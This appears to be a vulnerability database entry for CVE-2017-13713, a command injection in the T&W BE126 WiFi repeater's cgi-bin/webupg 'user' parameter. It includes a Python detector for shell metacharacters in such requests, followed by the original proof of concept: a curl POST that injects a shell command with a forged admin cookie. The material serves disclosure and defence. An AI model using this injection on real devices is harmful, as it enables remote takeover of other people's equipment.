Gongjin Electronics T&W WIFI Repeater BE126 Security Vulnerability

Vulnerability ID: 1124215
Vulnerability type: OS command injection
Published: 2017-09-04
Updated: 2019-10-23
CVE ID: CVE-2017-13713
CNNVD-ID: CNNVD-201708-1166
Platform: Hardware
CVSS score: 6.5
|Vulnerability source
https://www.exploit-db.com/exploits/42608
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201708-1166
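|Vulnerability details
Gongjin Electronics T&W WIFI Repeater BE126 is a wireless repeater made by the Chinese company Gongjin Electronics. A security vulnerability exists in the Gongjin Electronics T&W WIFI Repeater BE126. A remote attacker can exploit it to execute arbitrary code by sending a 'user' parameter containing metacharacters to cgi-bin/webupg.
|Exploit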
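
A detection check for the request pattern described above, as an added example that is not part of the original advisory or the vendor's code: it flags POSTs to cgi-bin/webupg whose 'user' field carries shell metacharacters, whether sent raw or percent-encoded. The function names, the metacharacter set and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

WEBUPG_PATH = "/cgi-bin/webupg"  # endpoint named in the advisory
# Characters a POSIX shell treats specially; none belong in an account name.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n\r]")


def parse_form(body):
    """Split a form body on '&' only, then decode each key and value."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return fields


def flag_webupg_request(method, url, body, checked=("user",)):
    """Return {field: [offending characters]} for a POST to webupg, else {}."""
    if method.upper() != "POST" or urlsplit(url).path != WEBUPG_PATH:
        return {}
    hits = {}
    for name, values in parse_form(body).items():
        if name not in checked:
            continue
        found = sorted({c for v in values for c in SHELL_META.findall(v)})
        if found:
            hits[name] = found
    return hits


# Constructed sample requests (method, URL, body) as a proxy or IDS might log them.
SAMPLES = [
    ("POST", "http://beconnected.client/cgi-bin/webupg",
     "name=HTTP&url=http://www.test.com&user=admin&password=a&port=8&dir=a"),
    ("POST", "http://beconnected.client/cgi-bin/webupg",
     "name=HTTP&url=http://www.test.com&user=%3Becho+test%3B&password=a&port=8&dir=a"),
    ("POST", "http://beconnected.client/cgi-bin/webupg",
     "name=HTTP&user=;echo test > /tmp/x;&password=a"),
    ("GET", "http://beconnected.client/index.html", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, flag_webupg_request(method, url, body))
```

Passing a wider `checked` tuple extends the same test to the other form fields, which the advisory does not state are affected.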
# Exploit Title:  WIFI Repeater BE126 – Remote Code Execution
# Date Publish: 09/09/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi

# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04

# CVE: CVE-2017-13713

1 - Description:

An HTTP POST request that contains the user parameter can give us
Remote Code Execution on the device.
The parameter is not sanitized at all, which causes it to be vulnerable.


2 - Proof of Concept:

curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
/var/mycode;&password=a&port=8&dir=a"
--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
01:45:46 GMT; langmanulset=yes;
sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
-X POST http://beconnected.client/cgi-bin/webupg

3 - Timeline:

29/4/2017 – Vulnerability Discovered.
29/4/2017 - Vendor not responding.
03/09/2017 – Exploit published.
|References

Source: MISC
Link: http://packetstormsecurity.com/files/143978/Wireless-Repeater-BE126-Remote-Code-Execution.html